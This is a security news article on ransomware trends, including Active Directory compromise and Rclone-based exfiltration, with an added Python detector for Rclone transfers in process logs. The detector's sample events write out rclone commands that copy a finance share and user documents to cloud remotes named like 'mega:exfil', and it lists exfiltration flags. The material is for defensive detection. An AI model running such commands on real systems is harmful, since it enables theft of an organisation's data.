Ransomware operators are increasingly using new tactics and strategies to make their attacks more effective. This includes new methods of putting more pressure on victims, such as the use of the double extortion technique, as well as new business tactics such as cartel formation. Another important aspect is the evolution of technical strategies and the use of sophisticated tools, allowing them to carry out stealth attacks.
What is happening?
In a recent session at the 2021 Incident Response Forum Masterclass, a panel of IT experts highlighted several traits related to evolving ransomware attacks.
- Experts have identified an increase in ransomware intrusions that begin by compromising Active Directory. Attackers often dwell inside the environment for long periods, enumerating every connected system.
- When Active Directory and domain controllers are hosted on a virtual machine, attackers tend to encrypt the entire VM environment, which slows down forensic analysis.
- To copy out files, attackers are moving away from traditional methods (FileZilla or Megaupload) and adopting open-source tools such as Rclone, which leaves fewer footprints and is harder to trace.
- In some cases, attackers have been collecting data from multiple sources, making it difficult to determine which data sources they compromised.
Recent incidents using these tactics
Several attackers have been observed using the above-mentioned tactics during recent attacks.
- The recent catastrophic attack on SolarWinds showed how attackers can use Active Directory to take hold of an organization's entire network.
- Conti ransomware was observed using the Rclone tool for data exfiltration and credential gathering.
- Egregor ransomware, which is assumed to be the successor of Maze, has also been observed including Rclone and Cobalt Strike in its attack campaigns.
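Because Rclone is a legitimate tool and is sometimes renamed before use, the exfiltration tactic described above (Rclone in the expert panel's findings and in the Conti and Egregor cases) is easier to spot from command-line shape than from the binary name alone. The following detection is an added example, not code from the article or from any vendor: it scores constructed process-creation events (Sysmon-style Image and CommandLine fields, sample values invented here) for rclone subcommands, transfer flags and `remote:path` arguments.

```python
import re
import shlex

# rclone bulk-transfer subcommands and flags that typically appear in large unattended transfers.
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_FLAGS = {"--config", "--transfers", "--ignore-existing", "--auto-confirm",
                "--no-check-certificate", "--multi-thread-streams", "--progress", "-q"}
# rclone remote syntax "name:path": a name of two or more characters (rules out C:\ drive
# letters) that is not a URL scheme such as https://.
REMOTE_TOKEN = re.compile(r"^[A-Za-z][\w-]+:(?!//)\S*$")

# Constructed process-creation events (Sysmon event 1-like fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\rclone\rclone.exe",
     "CommandLine": r'"C:\Program Files\rclone\rclone.exe" copy "C:\Shares\Finance" mega:exfil --transfers 32 -q'},
    {"Image": r"C:\Windows\Temp\svchost.exe",  # rclone renamed to dodge name-based rules
     "CommandLine": r"C:\Windows\Temp\svchost.exe sync C:\Users\Public\docs drive:backup --config C:\Windows\Temp\r.conf --ignore-existing"},
    {"Image": r"C:\Windows\System32\robocopy.exe",  # benign bulk copy, no rclone traits
     "CommandLine": r"C:\Windows\System32\robocopy.exe C:\Data D:\Backup /MIR"},
    {"Image": r"C:\Program Files\Git\cmd\git.exe",  # URL must not be mistaken for a remote
     "CommandLine": r"C:\Program Files\Git\cmd\git.exe clone https://example.invalid/repo.git"},
]

def rclone_signals(event):
    """Return the rclone indicators found in one process-creation event."""
    signals = []
    if event["Image"].rsplit("\\", 1)[-1].lower() in ("rclone.exe", "rclone"):
        signals.append("image:rclone")
    try:  # posix=False keeps Windows backslashes and quoted paths intact
        tokens = shlex.split(event["CommandLine"], posix=False)[1:]  # drop argv[0]
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = event["CommandLine"].split()[1:]
    tokens = [t.strip('"') for t in tokens]
    subs = [t.lower() for t in tokens if t.lower() in RCLONE_SUBCOMMANDS]
    if subs:
        signals.append("subcommand:" + subs[0])
    flags = sorted({t.split("=", 1)[0] for t in tokens if t.split("=", 1)[0] in RCLONE_FLAGS})
    signals.extend("flag:" + f for f in flags)
    signals.extend("remote:" + t for t in tokens if REMOTE_TOKEN.match(t))
    return signals

def is_suspicious(signals):
    """Alert on the rclone binary itself, or on rclone-style arguments even when it is renamed."""
    kinds = {s.split(":", 1)[0] for s in signals}
    return "image" in kinds or ("subcommand" in kinds and bool({"flag", "remote"} & kinds))

def detect(events):
    """Return (index, signals) for every event that looks like an rclone transfer."""
    scored = ((i, rclone_signals(e)) for i, e in enumerate(events))
    return [(i, s) for i, s in scored if is_suspicious(s)]
```

Pair this with a baseline of hosts where Rclone is expected; an alert from an unexpected host, especially one whose `--config` points at a temporary directory, is the kind of signal worth triaging early in an intrusion.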
The bottom line
Ransomware attackers are enhancing their tactics and sharpening their tools with every passing day. This evolution is troubling for targeted victims as well as for the security agencies working hard to cope with such attacks. Organizations should therefore keep upgrading their security measures, bearing in mind that such attacks will only grow fiercer in the near future.